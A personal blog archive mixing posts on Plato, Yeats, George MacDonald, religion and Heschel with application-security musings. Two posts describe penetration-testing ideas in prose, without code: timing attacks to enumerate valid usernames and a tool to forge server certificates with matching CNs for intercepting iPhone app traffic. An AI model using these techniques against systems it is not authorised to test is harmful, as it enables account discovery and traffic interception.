My good friend Felix and I had a lengthy theological discussion on Saturday evening. It was so lengthy and rather complex that I have two pages of notes, thoughts and points for further research that I quickly wrote down after …
A week before the new year arrived I set about creating the ever-famous list of resolutions. Each year, though, instead of the list becoming a recipe for failure, it becomes something that just might be achievable with the right balance. Well, this year (2011) one of the items on my list is to spend some serious time with Plato’s dialogues. No, not all of them. There are about 7 dialogues in my list. It has a heavy emphasis on the early dialogues according this site. Many of the dialogues I’ve read in the past and have even been the subject of a blog post or two. I’ll be attempting to extract from the dialogues Plato’s central themes, his philosophy as it develops and his methods. I’ll be using R.E. Allen’s translations instead of the collection of dialogues from my small Loeb library. My aim *here* is write about some of the observations I’ve made and my general musings. I’m writing to chronicle my brief journey for future reference.
The dialogues I’ll be reading:
Apology, Euthydemus, Euthyphro, Gorgias
Over the past several weeks a colleague and I have embarked on a mission that is probably akin to finding a sea route to the Indies in the 15th century. We call it a security ontology. I think this is a decent label. Since we’ve been trying to redefine and/or correct some of the old-school security maxims and practices for the past 4 years or so we thought that what better way than to revisit terminology. We could place that terminology within its semantic domain and, most importantly, map the relationships between these terms. In the end, we could all speak a similar language and sort of create or own linguistic community. It’s almost an experiment in more ways than one. Security terminology has always been an organic evolution. Hutton and Mortman would call this anarchy. I don’t know if I’d go *that* far, but it does catch the eye. So far, this project has gotten us through an information system model (necessary since that is usually an object of desire in most cases), typical vulnerability, adversary and attack language and now we’re right in the middle of everyone’s favorite, risk. Hopefully we’re not stuck in the Bermuda Triangle for too long. One of the primary epistemological measurements (or epistemic justification) that we’ll be using to determine if it “works” is coherence, or, how well do the individual pieces connect together to form a system of knowledge. Yes, it has it’s flaws, but I think this is a good first step. Anyone else working on something like this?
So, I’ve written some Ruby classes that interact with a web application that provides web service-like functions. One of the “interesting” features it provides is authentication. Having created the Ruby API to authenticate users I now want to try to use timing attacks to enumerate valid usernames. Unfortunately, I have not been able to find anything that fills this role. There is Benchmark, but it is more focused on CPU-like measurements. I’d like a tool that is focused on measuring time between HTTP requests and responses and makes adjustments for any overhead associated with Ruby itself.
In my struggle to meet the demands of my now long forgotten, but now remembered, resolutions of the New Year I read Adam’s Curse by W.B. Yeats last night. Some of the stanza’s I have faint memories of. If I can dare to do so I’d say that this poem summarizes nicely what I tell my children; doing things that are worthwhile take serious time and effort. Yeats, I think, agrees. Poetry, beauty and love all take work. I should correct myself here. If you are successful, the recipient of your effort should scarcely notice the labor. This is one of the signs of its quality according to Yeats; the quality of seeming like “a moment’s thought”.
Sadly, and I get this sense near the end, we’ve lost the motivation to pursue this sort of quality. Or we invent new ways that short-circuit some of that time and effort. Maybe when we do this, we lose some of the personal benefits of this exertion?
We sat together at one summer’s end,
That beautiful mild woman, your close friend,
And you and I, and talked of poetry.
I said, “A line will take us hours maybe;
Yet if it does not seem a moment’s thought,
Our stitching and unstitching has been naught.
Better go down upon your marrow-bones
And scrub a kitchen pavement, or break stones
Like an old pauper, in all kinds of weather;
For to articulate sweet sounds together
Is to work harder than all these, and yet
Be thought an idler by the noisy set
Of bankers, schoolmasters, and clergymen
The martyrs call the world.”
That beautiful mild woman for whose sake
There’s many a one shall find out all heartache
On finding that her voice is sweet and low
Replied, “To be born woman is to know –
Although they do not talk of it at school –
That we must labour to be beautiful.”
I said, “It’s certain there is no fine thing
Since Adam’s fall but needs much labouring.
There have been lovers who thought love should be
So much compounded of high courtesy
That they would sigh and quote with learned looks
precedents out of beautiful old books;
Yet now it seems an idle trade enough.”
We sat grown quiet at the name of love;
We saw the last embers of daylight die,
And in the trembling blue-green of the sky
A moon, worn as if it had been a shell
Washed by time’s waters as they rose and fell
About the stars and broke in days and years.
I had a thought for no one’s but your ears:
That you were beautiful, and that I strove
To love you in the old high way of love;
That it had all seemed happy, and yet we’d grown
As weary-hearted as that hollow moon.
Since I don’t blog nearly enough, I figured I’d at least use this as a dumping ground for all the lame ideas I have for tools that would have made my life easier. The first tool, or the most recent tool that would have saved some time, is the ssl-cert-spoofer-helper. Can you see that I’m not very creative? In my experience, especially with the iPhone you not only need a trusted CA certificate on your iPhone, but a server certificate that looks *almost* like what the iPhone application is expecting. Specifically, the CN has to match the original. So, rather than go through the trouble of grabbing the “real” server certificate, examining it, and using openssl to generate my CA and fake certificate, I would like a tool that does it all for me. I started working on one in Ruby, but it isn’t terribly interesting OR fun….at all.
Wow, has it really been a month since my last post? It certainly isn’t because I don’t have anything on my mind. It is a time/motivation thing. So, since I am writing now I must have something worthwhile to say? Maybe.
I’ve had several conservations over the past couple of years about religion. Yes, probably more than several. In particular though, these conversations centered around the most pure, earliest, oldest or the most correct form of a given religion. There is a continuing effort, it seems to me, by people of all religions to try to “get back to the roots” of their respective religions. It is as if they are saying that the current forms are somehow deficient. I find this fascinating.
Obviously, over time religions “evolve”. As people and cultures change, religious expression and understanding also undergo changes of their own. But, when people become unsatisfied by current religious forms, what are they trying to recover by going back in time? I would venture a guess that there is some connection in their minds between time and accuracy. The older the religious practice, the more pure (read: correct) it must be. Naturally, if this is our position, one would look to the oldest practices to find solace in their religion. But doesn’t this make a fatal mistake? Doesn’t it elevate the people of the past into positions that they themselves would not lay claim to? Namely, that they alone understood what the correct religion looked like or that they were less likely to make errors of judgment? I don’t think the devout peoples in antiquity would touch that with a 10-foot pole.
This grows more acute when there are religious figures in the mix. Even if these religious figures are elevated to some perfection because of some innate power, does it follow that emulating their religious practices would lead one to the correct understanding and practices of a religion? Doesn’t this commit the same error? It removes the figures from their historical setting. If they are a part of history, then aren’t they also constrained in some ways by space and time? I think there is a sort of reverse chronological snobbery at play here. Anything “old” is good, anything “new” is bad. Or, maybe, “the older the better”.
Why were the ancient caretakers of religion any more or less human, imperfect or prone to error than us? I don’t think they were any of those things. I think it is more a modern phenomena. Maybe it is a means to preserve and connect with a larger community. Maybe the current religious experiences are devoid of any real content, meaning or force. But is the answer to this that twe revert back to 2500 year old practices? I don’t think so.
Contrary to my expectations, Lilith by George MacDonald is a tough slog. I’m not sure why. Maybe I was expecting something more like The Princess and the Goblin. It seems as though Lilith is really a message with a story as a background rather than a story with a message in the background. I’m sure it is just my lack of sophistication. Despite this, MacDonald manages to transmit quite a few profound ideas to the attentive reader.
“These words are too big for you and me: all is one of them, and ever is another,” said a voice near me which I knew.
George MacDonald, Lilith, p.93
Ahh, such sweet music to my epistemological senses, however distorted they may be. Yes, there is little context to go on here, but it does speak for itself doesn’t it? All and ever are rarely epistemologically admissible and yet easily used in our everyday speech. Who has such authority to lay claim to all and ever? Is it you and I?
“Doubt”, I said to myself, “may be a poor encouragement to do anything, but it is a bad reason for doing nothing.”
George MacDonald, Lilith, p.97
Classic. Do I need to elaborate?
The classic CIA Triad (Confidentiality, Integrity and Availability) as it is affectionately called has been used for decades as a means to coarsely outline certain security/assurance expectations of a system. It has lasted this long because who can forget a TLA? Sadly, it is too general to be used effectively in most application security endeavors. There have been many who have attempted to elaborate on the triad to make it more useful. Microsoft’s Security Frame was a great effort. It identified the important and relevant categories that were hidden away within the triad. However, going from a TLA to a set of ten concepts or IAACSSCEA isn’t exactly easy to recall. Yes, I know, this should be documented as part of a defined process chock full of cheat sheets, tips and lists. Well, in an effort to align these concepts with my view of security functions and properties I created a set of six concepts that are derived from CIA, but that add more precision. You’ll probably recognize some of these labels. Yes, some of them made sense to retain from Microsoft’s Frame, others were useful labels gathered from the Common Criteria (oh no! not that!?). So, I managed to trim a few items by merging them with a more common categrory. Let’s see if an uninformed reader can make sense of these:
- Accountability and Event Reconstruction
- Data Protection
- Identity and Access Management
- Exception Management and Availability
- Management and Configuration
Identity and Access Management is perhaps the most intuitive category. In encompasses authentication, authorization and other concepts related to access control. Accountability is also fairly straight forward. What is your take on the others?
So, I’m reading Without Roots, by Pera and Ratzinger and stumbled across a sentence I cannot help but respond to.
…dialogue cannot be an instrument for the discovery of truth, because Revelation plays that role. In other words, in Christianity truth is not a process, but a state, not a becoming but a being.
– Marcello Pera, Without Roots, p.28
Having never read anything by Pera in the past, I don’t have any real reference point to infer what he may be getting at. Reading this sentence as it stands however, I have to take issue. Even if we grant that Revelation is a valid source of knowledge, it does not follow that we, without the aid of our reason, can understand unequivocally, through whatever medium this revelatory knowledge is delivered, these truths. In other words, there will always be a human mind receiving data. If this is so, then we have all of the baggage that goes along with the human receiver. Time, place, language, culture, religion, all of this will undoubtedly influence the receiver’s interpretation of data. To presume that we are a blank slate capable of receiving data, delivered in most cases within a historical context, exactly as a divine authority intended it is quite amusing. From what I’ve read so far, I don’t think Pera intends this, but I can’t be sure. This objective truth that Pera refers to may be a state, but human minds still have to go through a process of apprehension. This process, as history has no doubt proven, is always a challenge to get right. Furthermore, how do we know when we have received the *truth* and not falsehood? Which measurements do we use? Here, we fall back again upon time, place, language and culture. We judge this truth based on our current criteria for truth. So, if Revelation is a valid source of knowledge, we have to answer in a very real way how we gain access to that knowledge when it is encased in anthropological dressing.
What smites us with unquenchable amazement is not that which we grasp and are able to convey but that which lies within our reach but beyond our grasp; not the quantitative aspect of nature but something qualitative; not what is beyond our range of time and space but the true meaning, source and end of being, in other words, the ineffable.
– Abraham Joshua Heschel, Man is Not Alone P.4
Many times we experience things we do not fully understand and cannot begin to adequately articulate. It is as if something has grasped us as we struggle in search for meaning or something bigger than ourselves. Sometimes we are grasped even when we are not searching. Heschel comes very close, I think, to explaining this sort of experience. To those that are fortunate enough to share in such an encounter, Heschel’s words need little explanation. Nature’s mysteries sometimes draw us into this mystery of causes. Who or what is this mystery that we sometimes glimpse however dimly? What is it that we feel kinship with in those mundane and extradinary of times? Is it imagination or wishful expectation or something much, much greater?